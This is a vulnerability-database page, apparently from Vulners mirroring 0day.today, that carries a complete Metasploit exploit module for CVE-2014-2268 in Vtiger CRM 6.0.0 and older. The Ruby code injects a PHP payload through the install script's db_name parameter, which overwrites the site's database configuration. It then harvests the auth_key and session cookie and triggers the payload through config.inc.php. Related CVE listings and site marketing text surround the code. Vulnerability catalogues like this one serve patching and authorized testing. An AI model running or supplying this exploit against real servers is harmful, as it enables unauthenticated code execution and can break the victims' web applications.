Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Vtiger Install Unauthenticated Remote Command Execution Exploit

🗓️ 09 Apr 2014 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 27 Views

Vtiger Install Unauthenticated Remote Command Executio

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2014-2268
10 Apr 201400:00
circl
CVE		CVE-2014-2268
16 Nov 201401:00
cve
CVE		CVE-2014-2269
21 Apr 201414:00
cve
Cvelist		CVE-2014-2268
16 Nov 201401:00
cvelist
Cvelist		CVE-2014-2269
21 Apr 201414:00
cvelist
Dsquare		vtiger CRM 6.0.0 RCE
11 Apr 201400:00
dsquare
Dsquare		vtiger CRM 6.0 RC RCE
11 Apr 201400:00
dsquare
EUVD		EUVD-2014-2307
7 Oct 202500:30
euvd
Metasploit		Vtiger Install Unauthenticated Remote Command Execution
4 Apr 201408:16
metasploit
NVD		CVE-2014-2268
16 Nov 201401:59
nvd
Rows per page
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  # Application database configuration is overwritten
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Vtiger Install Unauthenticated Remote Command Execution',
      'Description'    => %q{
        This module exploits an arbitrary command execution vulnerability in the
        Vtiger install script. This module is set to ManualRanking due to this
        module overwriting the target database configuration, which may result in
        a broken web app, and you may not be able to get a session again.
      },
      'Author'         =>
        [
          'Jonathan Borgeaud < research[at]navixia.com >' # Navixia Research Team
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2014-2268' ],
          [ 'URL', 'https://www.navixia.com/blog/entry/navixia-find-critical-vulnerabilities-in-vtiger-crm-cve-2014-2268-cve-2014-2269.html'],
          [ 'URL', 'http://vtiger-crm.2324883.n4.nabble.com/Vtigercrm-developers-IMP-forgot-password-and-re-installation-security-fix-tt9786.html'],

        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Payload'        =>
        {
          'Space'       => 4000,
          'BadChars'    => "#",
          'DisableNops' => true,
          'Keys'        => ['php']
        },
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Vtiger 6.0.0 or older', { }]],
      'DisclosureDate' => 'Mar 5 2014',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to Vtiger', '/'])
        ], self.class)
  end

  def exploit
    print_status("Injecting payload...")
    rand_arg = Rex::Text.rand_text_hex(10)
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'index.php'),
      'headers'  => {'X-Requested-With' => rand_text_alpha(5)},
      'vars_get' => {
          'module'  => 'Install',
          'view'    => 'Index',
          'mode'    => 'Step5',
          'db_name' => "127.0.0.1'; if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } // "
      }})

    # Check timeout
    if not res
      print_error("Request timed out, please try again")
      return
    end

    if res.body =~ /name="auth_key"\s+value=".*?((?:[a-z0-9]*))"/i
      authkey   = $1
      phpsessid = res.get_cookies

      if authkey.blank?
        print_error("No AuthKey found")
        return
      elsif phpsessid.blank?
        print_error("No PHP Session ID found")
        return
      end

      print_status("Retrieved Authkey : #{authkey}")
      print_status("Retrieved PHPSESSID : #{phpsessid}")

      send_request_cgi({
        'method'     => 'GET',
          'uri'      => normalize_uri(target_uri.path, 'index.php'),
          'headers'  => {'X-Requested-With' => rand_text_alpha(5)},
          'cookie'   => phpsessid,
          'vars_get' =>
            {
              'module'   => 'Install',
              'view'     => 'Index',
              'mode'     => 'Step7',
              'auth_key' => authkey
            }
        })

        print_status("Executing payload...")
        send_request_cgi({
          'method'    => 'GET',
          'uri'       => normalize_uri(target_uri.path, 'config.inc.php'),
          'vars_get'  => { rand_arg => '1' }
        })
    else
      print_error("No auth_key pattern found")
    end
  end
end

#  0day.today [2018-01-11]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Apr 2014 00:00Current
0.7Low risk
Vulners AI Score0.7
EPSS0.77294
vtiger crmcommand executionvulnerabilitymetasploitnavixiaexploitremotesecuritydatabase configurationweb applicationcve-2014-2268php
27